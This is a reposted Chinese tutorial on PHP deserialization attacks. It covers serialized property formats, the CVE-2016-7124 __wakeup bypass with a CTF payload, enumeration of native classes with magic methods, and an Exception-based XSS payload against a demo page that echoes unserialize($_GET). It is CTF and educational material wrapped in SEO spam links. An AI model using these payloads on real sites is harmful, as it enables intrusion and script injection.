当前位置: 首页 > wzjs >正文

东莞网站建设价格价格口碑营销方案

东莞网站建设价格价格,口碑营销方案,个人博客网站如何做SEO,工程建设业绩公示网站目录 PHP-属性权限特征-共有&私有&保护 PHP-绕过漏洞-CVE&字符串逃逸 PHP-原生类获取&利用&配合 原生类利用简单案例Demo-XSS PHP-属性权限特征-共有&私有&保护 1、对象变量权限: public(公共的):在本类内部、外部类、子类都可以访…

目录

PHP-属性权限特征-共有&私有&保护

PHP-绕过漏洞-CVE&字符串逃逸

PHP-原生类获取&利用&配合

原生类利用简单案例Demo-XSS


PHP-属性权限特征-共有&私有&保护


1、对象变量权限:
public(公共的):在本类内部、外部类、子类都可以访问
protect(受保护的):只有本类或子类或父类中可以访问
private(私人的):只有本类内部可以使用
2、序列化数据显示:
public 属性序列化的时候格式是正常成员名
private 属性序列化的时候格式是%00 类名%00 成员名
protect 属性序列化的时候格式是%00*%00 成员名

%00代表 NULL 字节,下面代码为了直观显示,使用var_export函数进行转义显示未\0

PHP-绕过漏洞-CVE-2016-7124


1、CVE-2016-7124(__wakeup 绕过)
漏洞编号:CVE-2016-7124
影响版本:PHP 5<5.6.25; PHP 7<7.0.10
漏洞危害:如存在__wakeup 方法,调用 unserilize()方法前则先调用__wakeup 方
法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

<?php
header("Content-type: text/html; charset=utf-8");
//public private protected 说明
class test{public $name;private $age;protected $sex;public function __construct($name,$age,$sex){echo "__construct被调用\n";}public function __wakeup(){echo '反序列化时__wakeup被执行!!!';}
}unserialize($_GET['x']);

 正常情况下在反序列化时,__weakeup被调用

 但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

测试使用的php版本在漏洞范围内

 

案例:
[极客大挑战 2019]PHP


1、下载源码www.zip分析,触发 flag 条件


2、从代码上看,需要username=admin才能输出flag,但是由于反序列化必然会执行__wakeup 强制改变 username 值,且通过传入select参数反序列化


3、利用语言漏洞绕过 CVE-2016-7124,随便传入一个值可以看到php版本在漏洞范围内


4、构造 payload 后 修改满足漏洞条件触发

payload:O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

 注意改变属性个数

PHP-原生类获取&利用&配合

原生类(Native class)是指在编程语言的核心库或标准库中提供的类,这些类是语言本身提供的,而不是由用户自定义的类。原生类通常包含语言内置的功能和特性,用于解决常见的编程任务和操作。

PHP原生类使用场景:在代码中没有看到魔术方法的情况下使用的,如果对方环境没有开启相关模块功能,那么是没用的。

使用脚本在本地生成原生类,需要再php.ini文件中尽可能打开多的模块,这样可以生成更多可利用的原生类。代码如下:

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {$methods = get_class_methods($class);foreach ($methods as $method) {if (in_array($method, array('__destruct','__toString','__wakeup','__call','__callStatic','__get','__set','__isset','__unset','__invoke','__set_state'))) {print $class . '::' . $method . "\n";}}
}

 找到php.ini文件

 

原生类利用简单案例Demo-XSS

<?php
highlight_file(__file__);
$a = unserialize($_GET['k']);
echo $a;
?>

思路:

1.先看能触发的魔术方法-echo能够触发__toString方法
2.代码中没写魔术方法调用逻辑,那就需要用到原生类
3.使用魔术方法的原生类去利用
4.获取魔术方法的原生类(使用脚本去生成,生成多少与当前环境模块开关有关
默认的原生类生成脚本有太多原生类和方法了,这里只保留__toString方法,生成其有的原生类)

 创建一个异常对象,并序列化

<?php
$a=new Exception("<script>alert('xiaodi')</script>");
echo urlencode(serialize($a));
?>

代码中echo一个反序列化的对象,是会异常的,php中对象不能转换为字符串,故而形成了pop链。

创建异常对象(产生异常返回xss代码)  ->  传入序列化后的异常对象  ->  echo 反序列化得到异常对象  ->  对象不能转字符串(异常返回xss代码)  ->  echo触发toString将返回的xss代码输出被浏览器渲染

http://www.dtcms.com/wzjs/21664.html

相关文章:

  • 政府网站优秀案例西安网站seo公司
  • 巧家县住房和城乡建设局网站高端网站建设公司排行
  • 长春专业做网站的公司排名百度爱采购排名
  • 海口市龙华区核酸检测seo描述是什么
  • 网站建设. 龙兵科技外贸怎么找客户资源
  • 美容 北京 公司 网站建设seo技术顾问
  • 软件开发模型图青岛百度快速优化排名
  • 网站初期seo怎么做福州短视频seo推荐
  • 泊头网站建设网络优化报告
  • 购物网站建设与实现软文写作的基本要求
  • 如何做论坛网站 知乎网站seo外链
  • 自己怎么做网站建设百度账号购买1元40个
  • 怎么做网站记者如何创建一个app平台
  • 湖北营销型网站建设合肥seo整站优化
  • 杭州住房城乡建设网站查询关键词歌曲歌词
  • asp.net网站百度指数数据分析报告
  • 网站logo怎么做透明在百度上怎么发布信息
  • vps 网站备案搭建一个app平台要多少钱
  • 做ppt模仿网站广州推广引流公司
  • 西宁市网站建设价格产品seo是什么意思
  • wordpress 导航站主题百度加盟
  • 做垃圾网站来干嘛跨境电商平台推广
  • 网站建设费用计入什么二级科目seo线下培训班
  • 南城免费做网站微商推广哪家好
  • wordpress颜文字插件网站优化培训
  • 淄博做网站的公司有哪些seo投放
  • 网站的建设与运营产品营销方案策划书
  • 廊坊建设局网站nba排行榜最新排名
  • 网站联盟有哪些策划书模板
  • 北京的制作网站的公司搜索引擎推广的三种方式